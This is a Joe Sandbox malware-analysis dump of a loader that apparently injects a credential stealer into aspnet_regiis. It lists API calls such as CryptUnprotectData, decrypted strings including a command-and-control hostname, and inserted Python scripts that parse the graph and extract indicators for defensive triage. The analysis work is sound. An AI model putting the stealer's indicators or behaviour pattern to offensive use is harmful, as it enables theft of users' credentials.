                                                                            • Opcode Fuzzy Hash: 822ad0e8d94173505580cfe7d1f54461285590f5db0f7c6a09e2a8107b563427
                                                                            • Instruction Fuzzy Hash: A07198B5609301DFE714DF58C8A0B6BBBE6EBC9304F10881CE9958B390C776E845CB92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                             • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4$5$:$;
                                                                            • API String ID: 0-1928560196
                                                                            • Opcode ID: d153f77c8721b22faaf95cadedc20aab23add219191523cad3ecf1d766cdaf85
                                                                            • Instruction ID: 5872c7ef678b1f2ae641e915df1441d0cede4145837c0e98e5c7eba77e510031
                                                                            • Opcode Fuzzy Hash: d153f77c8721b22faaf95cadedc20aab23add219191523cad3ecf1d766cdaf85
                                                                            • Instruction Fuzzy Hash: 9231AF3664D3828FD324CAA8C88479ABBE1ABC5314F19892ED5D85B3C2C6759841CB12
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                             • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4$5$:$;
                                                                            • API String ID: 0-1928560196
                                                                            • Opcode ID: 6116ab6c56a5ca4c68f96decbec347a9299d2bb6600b90c1d668b41a6306a8d2
                                                                            • Instruction ID: fee3e4609beb734bce99acafa89ea6e0af7acdaafaa53e0d0f9879c3f3f10755
                                                                            • Opcode Fuzzy Hash: 6116ab6c56a5ca4c68f96decbec347a9299d2bb6600b90c1d668b41a6306a8d2
                                                                            • Instruction Fuzzy Hash: 0531B07560D3C08FD360CA28C98479ABBE2ABD2354F188D7ED4C957395CB74A845CB03

                                                                            Execution Graph

                                                                            Execution Coverage:8.5%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:12%
                                                                            Total number of Nodes:200
                                                                            Total number of Limit Nodes:14
                                                                             execution_graph (process 3, aspnet_regiis; the raw node and edge adjacency list is omitted here). API calls present in the graph, grouped by the root function the dump lists them under, with the address of the node that makes the call:
                                                                             • 33ca97e: SysAllocString (33ca9e0, 33caa7d), VariantInit (33caaee), VariantClear (33cac8a), SysFreeString (33cadd9; twice at 33cadfd and at 33cae0d), RtlFreeHeap (33cdc58), LdrInitializeThunk (33d3da0, 33ce140, 33d0d90)
                                                                             • 33c4a7f: CoSetProxyBlanket
                                                                             • 33cdc18: RtlAllocateHeap (33cdc1e)
                                                                             • 33c1859: CoSetProxyBlanket (33c185e, reached through 33ac2a0)
                                                                             • 339d0b0: GetCurrentThreadId (339d0f1), ShellExecuteW (339d236), GetForegroundWindow (339d24f), GetCurrentProcessId (339d259), LoadLibraryExW (339e27e), FreeLibrary (339f960, 33d0ca5), ExitProcess (339d277)
                                                                             • 33d0676: LoadLibraryExW (33d0700)
                                                                             • 33b4750: LdrInitializeThunk (33d3f40, reached through 33b4860)
                                                                             • 33b509d, 33d10f1, 33d12d1, 33d13d5: LdrInitializeThunk (33d0d90)
                                                                             • 33a5b37: LdrInitializeThunk (33d3da0, reached through 33ac6e0)
                                                                             • 33a07f7: CoInitialize (33a07f7, 33a0800), CoInitializeSecurity (33a091c), CoUninitialize (33a0c5f, 33a0ffb), GetSystemDirectoryW (33a0c6f), GetLogicalDrives (33b75f1, reached through 33b7230), CopyFileW (33baa40), RtlFreeHeap (33cdc40, 33b9d00, 33ba6d0, 33baa40), LdrInitializeThunk (33b79a0, 33b7b90, 33b9d00, 33ba6d0, 33baa40, 33bd360, 33d3f40, 33d0d90); collapsed subcalls: 339db20 (20 API calls, invoked repeatedly), 33beb60 (6 API calls), 33c5210 (6 API calls)
                                                                             • 33ad5af: CryptUnprotectData (33ad863), LdrInitializeThunk (33d0d90)
                                                                             • 33d0f68: GetForegroundWindow (33d0f71)
                                                                             • 33cdce0: RtlFreeHeap (33cdc40), LdrInitializeThunk (33d0d90)
                                                                             • 33a00c5: RtlFreeHeap (33cdc40, reached through 33d0cc0)
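The execution_graph dump for process 3 above is emitted as a flat adjacency list: node entries of the form `id address [API ...]`, edges of the form `src->dst`, and collapsed subcalls rendered as `N API calls`. The parser below is an added example, not Joe Sandbox code: it reads that layout, finds the root nodes (no incoming edge) and lists every API call reachable from a root, so that, for instance, the entry at 33ad5af can be tied to CryptUnprotectData (DPAPI decryption, consistent with the report's "Tries to harvest and steal browser information" signature). The sample input is two contiguous excerpts copied verbatim from the process-3 (aspnet_regiis) graph; the rule that node ids are decimal and addresses are lowercase hex containing at least one letter is my assumption about the format, not something Joe Sandbox documents.

```python
import re
from collections import defaultdict, deque

# Constructed sample: two contiguous excerpts copied from the execution_graph dump
# of process 3 (aspnet_regiis) in this report. Edges may point at nodes outside
# the excerpt (e.g. 16081); the parser tolerates that.
SAMPLE_GRAPH = (
    "16093 33ad5af 16094 33ad5b4 16093->16094 16103 33d4110 16094->16103 16096 33ad6ce "
    "16101 33ad863 CryptUnprotectData 16096->16101 16102 33ad88d 16096->16102 16097 33ad5ca "
    "16097->16096 16099 33ad603 16097->16099 16097->16102 16107 33d41f0 16097->16107 "
    "16099->16096 16099->16102 16113 33d0d90 LdrInitializeThunk 16099->16113 16101->16102 "
    "16102->16102 16105 33d4140 16103->16105 16104 33d419e 16104->16097 16105->16104 "
    "16114 33d0d90 LdrInitializeThunk 16105->16114 16109 33d4210 16107->16109 16108 33d426e "
    "16110 33d432e 16108->16110 16116 33d0d90 LdrInitializeThunk 16108->16116 16109->16108 "
    "16115 33d0d90 LdrInitializeThunk 16109->16115 16110->16099 16113->16096 16114->16104 "
    "16115->16108 16116->16110 "
    "16034 33a07f7 CoInitialize 16035 33a0800 CoInitialize 16034->16035 16036 33a090c "
    "16035->16036 16037 33a0c5f CoUninitialize 16036->16037 16038 33a0c6f GetSystemDirectoryW "
    "16036->16038 16039 33a091c CoInitializeSecurity 16036->16039 16040 33a093e 16036->16040 "
    "16078 33a0c65 16036->16078 16037->16078 16038->16040 16039->16037 16039->16038 "
    "16039->16040 16040->16037 16040->16038 16041 33cdc40 RtlFreeHeap 16040->16041 "
    "16042 33a0dac 16040->16042 16041->16040 16081 33b7230 16042->16081 16044 33a0f31 "
    "16045 339db20 20 API calls 16044->16045"
)

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_HEX = re.compile(r"^[0-9a-f]{6,8}$")


def parse_execution_graph(text):
    """Parse a Joe Sandbox execution_graph dump into (nodes, edges).

    nodes: {node_id: (address, [label, ...])}; edges: {node_id: {successor, ...}}.
    Assumption (mine): node ids are decimal, addresses are lowercase hex with at
    least one letter, and any other token belongs to the most recent node as an
    API name or a folded "N API calls" note. A leading "execution_graph" word is
    dropped because no node is open yet when it is seen.
    """
    # Fold "N API calls" into one token so N is not mistaken for a node id.
    toks = re.sub(r"(\d+) API calls", r"\1_API_calls", text).split()
    nodes, edges = {}, defaultdict(set)
    cur, i = None, 0
    while i < len(toks):
        t = toks[i]
        m = _EDGE.match(t)
        if m:
            edges[int(m.group(1))].add(int(m.group(2)))
            i += 1
            continue
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        if t.isdigit() and _HEX.match(nxt) and not nxt.isdigit():
            cur = int(t)
            nodes[cur] = (nxt, [])
            i += 2
            continue
        if cur is not None:  # label (API name or folded note) of the open node
            nodes[cur][1].append(t.replace("_API_calls", " API calls"))
        i += 1
    return nodes, dict(edges)


def entry_points(nodes, edges):
    """Node ids with no incoming edge: the roots the graph was drawn from."""
    targets = {d for dsts in edges.values() for d in dsts}
    return sorted(n for n in nodes if n not in targets)


def reachable_apis(nodes, edges, root):
    """(address, label) for every labelled node reachable from root, root included."""
    seen, queue, found = {root}, deque([root]), []
    while queue:
        n = queue.popleft()
        addr, labels = nodes.get(n, ("?", []))
        found.extend((addr, lab) for lab in labels)
        for succ in edges.get(n, ()):
            if succ not in seen:
                seen.add(succ)
                queue.append(succ)
    return found


def node_by_addr(nodes, addr):
    """First node id at addr (library stubs such as 33d0d90 appear more than once)."""
    return next(n for n, (a, _) in nodes.items() if a == addr)


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(SAMPLE_GRAPH)
    for root in entry_points(nodes, edges):
        apis = sorted({lab for _, lab in reachable_apis(nodes, edges, root)})
        print(f"{nodes[root][0]}: {', '.join(apis) or '(no API calls)'}")
```

Run on the full dump, the same three functions give a quick triage view: 33ad5af reaches CryptUnprotectData, 33a07f7 reaches CoInitializeSecurity, GetSystemDirectoryW and the collapsed 339db20 helper, and the roots without API labels are pure control flow. Multiple nodes share one address when the same helper is inlined into several callers, so group by address before counting.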
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                             • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #Tw$7DEA0A49D8D68686C58ADC3142F6BB48$;:54$;:54$=i<o$F]$J!G'$K=C#$Noni$T1S7$U`3$V[$_]$`1d7$d5h;$f[zU$mafnufacut.cyou$xr${){/${-S
                                                                            • API String ID: 0-4031840133
                                                                            • Opcode ID: a82b9ed8bd979cb90a8ba0ac04c9085f9d8d2be4be68d23ba4f64388ef2f96de
                                                                            • Instruction ID: b23cf8e4c0be00c4da9be09a0ecf1d56734eaf288fbd1d686c6af80c1e54e1d2
                                                                            • Opcode Fuzzy Hash: a82b9ed8bd979cb90a8ba0ac04c9085f9d8d2be4be68d23ba4f64388ef2f96de
                                                                            • Instruction Fuzzy Hash: 11D220B5A047408FD724DF29D8D172ABBE1FF86304F1889ACD4D68F696D736A406CB81
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                             • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #Tw$7DEA0A49D8D68686C58ADC3142F6BB48$;:54$;:54$F]$Noni$T1S7$V[$_]$f[zU$mafnufacut.cyou$xr
                                                                            • API String ID: 0-458242938
                                                                            • Opcode ID: 5e927755b05ddda52c10e8ad7ed0368758d89e9b8be3a2a8ea6d92bd84a3ef6f
                                                                            • Instruction ID: a320c88a8bcfaad7eb4110c5a76c6d10f721caca5ce322e9f5ff8fdea00611e0
                                                                            • Opcode Fuzzy Hash: 5e927755b05ddda52c10e8ad7ed0368758d89e9b8be3a2a8ea6d92bd84a3ef6f
                                                                            • Instruction Fuzzy Hash: 73C232B5A047408FD724DF29D8D1726BBE2FF86304F1885ACD4968F696D73AE406CB81
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                             • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: "JZ$'Rx/$*JZ$34t$ODIF$Y?^i$fjnr$kk$syrh$vNHF
                                                                            • API String ID: 0-2617420629
                                                                            • Opcode ID: bbddcb7dd66b118e28477bea64e294380ad5fff9f08f796546582d5f702fb6d5
                                                                            • Instruction ID: a21c0fe918775479aa2ccbc4db4bb6e3014c6992a5d762ab5a989d4c969914b7
                                                                            • Opcode Fuzzy Hash: bbddcb7dd66b118e28477bea64e294380ad5fff9f08f796546582d5f702fb6d5
                                                                            • Instruction Fuzzy Hash: 4313D374504B818BE725CF39C8D07A3BBE5AF57304F0889ADC1EB8B686D779A405CB61
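The per-function metadata blocks above (APIs, Snapshot File, String ID, Opcode ID) are where the decrypted strings of the injected payload surface: the two process-3 blocks list the hostname mafnufacut.cyou and the 32-hex-character token 7DEA0A49D8D68686C58ADC3142F6BB48 among short junk strings, while the loader's own blocks carry only CRT strings. The script below is an added example, not Joe Sandbox code: it parses blocks in this text layout, recovers each function's API names and String ID entries, and picks out the entries shaped like indicators (a hostname, or a 32-hex token). The sample text is copied from blocks on this page. Two assumptions are mine: the `$` separator is inferred from the layout (a block listing `4$5$:$;` holds four one-character strings), so a decrypted string that itself contains `$` would be split; and the process name is read from the `hcaresult_<pid>_..._<image>.jbxd` snapshot name as it appears here.

```python
import re

# Constructed sample: two metadata blocks copied from this report (process 3,
# aspnet_regiis, and process 0, Loader.exe), Associated lines left out.
SAMPLE_REPORT = """\
Strings
Memory Dump Source
• Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
Similarity
• API ID:
• String ID: #Tw$7DEA0A49D8D68686C58ADC3142F6BB48$;:54$;:54$F]$Noni$T1S7$V[$_]$f[zU$mafnufacut.cyou$xr
• API String ID: 0-458242938
• Opcode ID: 5e927755b05ddda52c10e8ad7ed0368758d89e9b8be3a2a8ea6d92bd84a3ef6f
APIs
• WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6E501366,00000000,00000001,00000000,?,?,6E500624,?,00000000,00000000), ref: 6E501BBD
• GetLastError.KERNEL32(?,6E501366,00000000,00000001,00000000,?,?,6E500624,?,00000000,00000000,?,?,?,6E500BC7,00000000), ref: 6E501BC9
  • Part of subcall function 6E501B8F: CloseHandle.KERNEL32(FFFFFFFE,6E501BD9,?,6E501366,00000000,00000001,00000000,?,?,6E500624,?,00000000,00000000,?,?), ref: 6E501B9F
• ___initconout.LIBCMT ref: 6E501BD9
  • Part of subcall function 6E501B51: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E501B80,6E501353,?,?,6E500624,?,00000000,00000000,?), ref: 6E501B64
• WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6E501366,00000000,00000001,00000000,?,?,6E500624,?,00000000,00000000,?), ref: 6E501BEE
Memory Dump Source
• Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
• Opcode ID: e6373729694fa8336e1844fb9a8539a3f07d9be6df108678cbcb5512349f9b45
"""

# "Name.MODULE(" or "Name.MODULE ref:", optionally prefixed by the subcall note.
_API = re.compile(r"^(?:Part of subcall function [0-9A-Fa-f]+: )?([A-Za-z_]\w*)\.([A-Za-z0-9_]+)(?:\(| ref:)")
# Assumption: snapshot names follow hcaresult_<pid>_<n>_<base>_<image>.jbxd as seen on this page.
_SNAPSHOT = re.compile(r"^hcaresult_(\d+)_\d+_[0-9a-f]+_(.+)\.jbxd$")
_HOSTNAME = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,}$")
_HEX32 = re.compile(r"^[0-9A-Fa-f]{32}$")


def _new_block():
    return {"apis": [], "strings": [], "snapshot": None, "process": None, "opcode_id": None}


def parse_function_blocks(text):
    """Split a Joe Sandbox function listing into blocks; a block closes at its Opcode ID line."""
    blocks, cur = [], _new_block()
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if line.startswith("Snapshot File:"):
            cur["snapshot"] = line.split(":", 1)[1].strip()
            m = _SNAPSHOT.match(cur["snapshot"])
            if m:
                cur["process"] = f"{m.group(2)} (process {int(m.group(1))})"
        elif line.startswith("String ID:"):
            rest = line.split(":", 1)[1].strip()
            cur["strings"] = rest.split("$") if rest else []  # '$' separator: assumption
        elif line.startswith("Opcode ID:"):
            cur["opcode_id"] = line.split(":", 1)[1].strip()
            blocks.append(cur)
            cur = _new_block()
        else:
            m = _API.match(line)
            if m:
                cur["apis"].append((m.group(1), m.group(2)))
    return blocks


def extract_iocs(blocks):
    """Sorted unique (kind, value, process) for String ID entries shaped like indicators."""
    found = set()
    for b in blocks:
        for s in b["strings"]:
            if _HOSTNAME.match(s):
                found.add(("hostname", s, b["process"] or "?"))
            elif _HEX32.match(s):
                found.add(("hex32", s, b["process"] or "?"))
    return sorted(found)


if __name__ == "__main__":
    blocks = parse_function_blocks(SAMPLE_REPORT)
    for b in blocks:
        print(b["process"], sorted({name for name, _ in b["apis"]}), len(b["strings"]), "strings")
    for kind, value, proc in extract_iocs(blocks):
        print(f"{kind:8} {value}  <- {proc}")
```

The hostname check only tells you a string is shaped like a domain; confirm it against the C2 list in the extracted configuration before blocking it, and treat the hex32 token as a candidate identifier to correlate across samples rather than as a verified build ID.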

                                                                            Control-flow Graph

                                                                             control_flow_graph for 33ca97e (the basic-block edge list is omitted here). Basic blocks that call APIs or other functions, by address range:
                                                                             • 33ca9e0-33caa4f: SysAllocString
                                                                             • 33caa7d-33caaa3: SysAllocString
                                                                             • 33caaee-33cab3a: VariantInit
                                                                             • 33cabed-33cac1d: call 339c8b0, call 33ba570
                                                                             • 33cac7f-33cac87: call 339c8c0
                                                                             • 33cac8a-33caca4: VariantClear
                                                                             • 33cad4e-33cad76: call 33b23f0
                                                                             • 33cade4-33cadf8: SysFreeString
                                                                             • 33cadfd-33cae0b: SysFreeString * 2
                                                                             • 33cae0d-33cae1b: SysFreeString * 2
                                                                             • 33caea2-33caeed: call 33cdf80, call 33cdfb0
                                                                             • 33caef4-33caf0f: call 33ce230
                                                                             • 33caf18-33caf1a: call 33ce140
                                                                             • 33caf1f-33caf26: call 33ce140
                                                                             • 33caff2-33cb00f: call 33cdc40
                                                                             • 33cb112-33cb11c: call 33cdbb0
                                                                             • 33cb11f-33cb129: call 33cdbb0
                                                                             • 33cb132-33cb145: call 33d3da0
                                                                             • 33cb148-33cb15b: call 33d3da0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: AllocString
                                                                            • String ID: ;:54$;:54
                                                                            • API String ID: 2525500382-2193779323
                                                                            • Opcode ID: 7a53a2f8b9e98f51432602f9b08014eb44696df175800539962862a8d1f645e5
                                                                            • Instruction ID: e2480605accd08b4820d9c179e2a9b0d6719c7cd479caf8cd00f3ea9b60d6de9
                                                                            • Opcode Fuzzy Hash: 7a53a2f8b9e98f51432602f9b08014eb44696df175800539962862a8d1f645e5
                                                                            • Instruction Fuzzy Hash: B812EE76A10601DFD724DF24E8D0A2AB7BAFF89310F18866CD4569B794D735E812CB90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ;:54$InA>$InA>$P$SV
                                                                            • API String ID: 0-1927751682
                                                                            • Opcode ID: d0f413ad77fbf2423d53bb3cb1f12b861819ebaaa2242c76135a5a6a9dfec8f0
                                                                            • Instruction ID: 12a1a829b09e58c339bd6912b0abbc3b1dcb0d42ff26428354fe99e56a0137c4
                                                                            • Opcode Fuzzy Hash: d0f413ad77fbf2423d53bb3cb1f12b861819ebaaa2242c76135a5a6a9dfec8f0
                                                                            • Instruction Fuzzy Hash: 4C824676E01215CFDB18CF68D8C16AEB7B6FF49310F1A8168DA41AB395D734A852CF90

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 033AD87D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: CryptDataUnprotect
                                                                            • String ID: ;:54$J$r
                                                                            • API String ID: 834300711-2889753551
                                                                            • Opcode ID: 0a5885051481e1dc10eb7bbfc0a091e4ff16c19c87186cfbf8b3c6599c18efb9
                                                                            • Instruction ID: 3292ae458695d30f3db43cb691e1e5cf021cea1e507b30086e2f62cba15dda27
                                                                            • Opcode Fuzzy Hash: 0a5885051481e1dc10eb7bbfc0a091e4ff16c19c87186cfbf8b3c6599c18efb9
                                                                            • Instruction Fuzzy Hash: 20D145B69083408FD724DF28D8E07ABB7E5EF96304F08896DE4DA8B751D7709941CB82

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ;:54
                                                                            • API String ID: 0-2887251705
                                                                            • Opcode ID: f0f57b41538f94d2920bd188ec99a1d0390b691f4925138d7b5183a886ca3b64
                                                                            • Instruction ID: 3a85120f101e38818699a33c4998f78bfabfe284065934821f4114921789a5ce
                                                                            • Opcode Fuzzy Hash: f0f57b41538f94d2920bd188ec99a1d0390b691f4925138d7b5183a886ca3b64
                                                                            • Instruction Fuzzy Hash: ACF145B6E01206CFDB04CF68D8817AEB7B6FF89300F2981A8D545AB785D7759942CF90
                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL(033D40E0,005C003F,00000002,00000018,?), ref: 033D0DBE
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                            • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                            • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                            • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0339D165
                                                                            • ShellExecuteW.SHELL32(00000000,81368735,033D8050,?,00000000,00000005), ref: 0339D249
                                                                            • GetForegroundWindow.USER32(?,00000000,00000005), ref: 0339D24F
                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000005), ref: 0339D259
                                                                            • ExitProcess.KERNEL32 ref: 0339D279
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentProcess$ExecuteExitForegroundShellThreadWindow
                                                                            • String ID: ps
                                                                            • API String ID: 1013327911-2817149839
                                                                            • Opcode ID: a36086e2e28cee1dcb1ffc45b18ea76cf87a47a73e6f4fe8cf8b95d4be21f264
                                                                            • Instruction ID: b976c80cb241438214e78c21443e0c66aff4c636e8e78030c30fdd623552aad8
                                                                            • Opcode Fuzzy Hash: a36086e2e28cee1dcb1ffc45b18ea76cf87a47a73e6f4fe8cf8b95d4be21f264
                                                                            • Instruction Fuzzy Hash: 694101312083409BEB04AB79A89A36FBBDA9FC6714F19891DD4C1DF281CA7894068B52

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 033D0F76
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: ForegroundWindow
                                                                            • String ID: 2123
                                                                            • API String ID: 2020703349-208623094
                                                                            • Opcode ID: da1a27c50c8ad60bc2e641fbd69d46834275d91c138a9d2bc7026357f6ce1b6d
